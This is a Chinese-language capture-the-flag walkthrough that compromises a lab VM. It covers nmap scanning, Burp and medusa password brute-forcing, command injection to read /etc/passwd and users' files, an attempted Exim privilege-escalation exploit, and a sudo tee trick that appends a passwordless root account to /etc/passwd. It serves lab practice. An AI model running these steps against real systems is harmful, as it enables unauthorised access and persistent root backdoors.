扫描获取目标 IP 地址:192.168.67.135
nmap -sn 192.168.67.0/24

扫描目标,获取系统信息和开放端口:80 && 22
nmap -A -p- 192.168.67.135
(初步猜想就是通过 web 获取到系统用户密码,再通过 ssh 登陆最后提权的思路)

登陆 http://192.168.67.135
首先看下 wapplayzer,发现是 Nginx ,但暂时得不到详细版本,故先记录,以防备用
页面上写着:Admin Information Systems Login,说是以系统用户登录
再看看发现 POST 表单,试了下弱口令,不解,故拿出 Burpsuite 看看能否破解密码
浏览器设置好代理,抓请求然后burpsuite调至intruder,
拷贝一份字典到主目录下,方便 burpsuite 使用字典,在 intruder 下加载 payload ,start attack爆破即可
cp /usr/share/wordlists/nmap.lst /root/

等待一段时间,得到密码为 happy [通过 length 不同即可看出密码],登陆进去看看
发现一个 command 链接,点进去挑选了个 List Files 可看到熟悉的东西:

total 24
-rw-r--r-- 1 root root 1783 Apr 5 2019 command.php
drwxr-xr-x 2 root root 4096 Mar 24 2019 css
drwxr-xr-x 2 root root 4096 Mar 24 2019 images
-rw-r--r-- 1 root root 506 Apr 6 2019 index.php
-rw-r--r-- 1 root root 1473 Apr 7 2019 login.php
-rw-r--r-- 1 root root 663 Mar 24 2019 logout.php

cat+/etc/passwd
这不就是 linux 下经常使用的 ls 命令么...所以,抓下来看看能不能修修改改再发过去? --- send to repeater
通过修改我们可以 cat /ect/passwd 下有四个账户:root / sam / jim / charles
最初的猜想验证了,很可能就是 ssh 登陆进去...
到各个 /home/ 下看看有没有特别东西
ls+la+/home/sam:没啥东西
ls+la+/home/jim:发现只有一 backups目录和一 test.sh文件可查
cat+test.sh:没啥特别的,几行字
ls+/home/jim/backups:看看backups目录下都有啥,发现哟一个oldpassword文件,这...又是要爆破密码么...(果然)
cat+/home/jim/backups/old-passwords.bak:将得到的密码复制一份到 kali的/root/oldpwd.txt 中
vim oldpwd.txt

使用美杜莎爆破,得到密码 jibril04
medusa -M ssh -u jim -h 192.168.67.135 -P oldpwd.txt

ssh登陆上去:ssh jim@192.168.67.135
打开刚才无权限打开的mbox,原来是封邮件,并且得到版本信息:Exim 4.89
所以search一波有没有可以直接提权的:searchsploit Exim Local Privilege

发现确实有该版本的:Exim 4.87 - 4.91 - Local Privilege Escal | linux/local/46996.sh

于是乎:scp 46996.sh jim@192.168.67.135:/home/jim/传过去
bash 46996.sh执行,报错...
漏洞利用不成功...

到 /var/mail 目录下看看还有无有其它邮件:cd /var/www
发现一封:

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles

哦吼,直接送上密码
既然是 boss 要给的,那是不是 charles 的权限要大点?
ssh charles@192.168.67.135
ls

木有发现什么东西,不过直觉上到这一步应该就是要提权了的。怎么提?这是个好问题那就看看自己有什么 sudo 权限:sudo -l

开心的事情是:发现一个具有 sudo 权限的:/usr/bin/teehee,但是并不知道要怎么使用,查看一下帮助文档
/usr/bin/teehee --help

原来通过该命令(前提是拥有绝对的权限)可以在任意文件后边添加内容那为什么不伪造另一个 root(到这里,我仿佛听到了邪恶的笑声...)
echo "haha::0:0:root:/root:/bin/bash" | sudo /usr/bin/teehee -a /etc/passwd
su haha
cd /root
ls
cat flag.txt

Congratulations!!!

总结:
1.密码破解
2.漏洞利用
3.提权增添虚假root账号